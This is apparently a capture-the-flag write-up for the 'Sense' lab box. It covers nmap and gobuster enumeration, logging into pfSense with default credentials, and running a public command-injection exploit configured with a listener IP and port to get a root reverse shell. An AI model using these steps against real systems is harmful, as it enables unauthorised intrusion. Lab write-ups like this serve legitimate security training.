Summary
Sense is an easy Linux box that can be exploited by performing a directory brute-force to identify the login page of pfSense. The brute-force also helps to identify a file that contains credentials for pfSense. This combination was used to exploit pfSense with a public exploit to obtain a root shell.
Discovery
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.94.74
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Gobuster found the following locations:
https://10.129.94.74:443/system.php
https://10.129.94.74:443/changelog.txt (Status: 200)
https://10.129.94.74:443/system-users.txt (Status: 200)
https://10.129.94.74:443/xmlrpc.php (Status: 200) [Size: 384]
The page: https://10.129.94.74/changelog.txt, showed the following message:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
This strongly suggests a vulnerability is present. The following page: https://10.129.94.74/system-users.txt, showed an active user:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
After a couple tries, it was found that the default combination is:rohit:pfsense
The user is now authenticated to the pfSense dashboard:
Exploitation
Searchsploit was used to identify vulnerabilities within pfSense since the changelog.txt suggested there is a unpatched vulnerability.
jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The following exploit was used to exploit this vulnerability: https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py The script was modified as follows:
username = "rohit"
password = "pfsense"
listener_ip = "10.10.14.24"
listener_port = "4444"
target_ip = "10.129.94.74"
url = "https://{}/".format(target_ip)
proxied_url = "https://127.0.0.1:31337/"
A netcat listener was setup and the script was run with:python pfsense_exec.py nc
This provided a root shell. From here the root.txt and user.txt can be retrieved.
Conclusion
This was a very easy box that could be exploited by properly brute-forcing for files and directories. The exploitation of pfSense was straightforward so it didn’t take too long to root this box. Hope you had the same and enjoyed this writeup!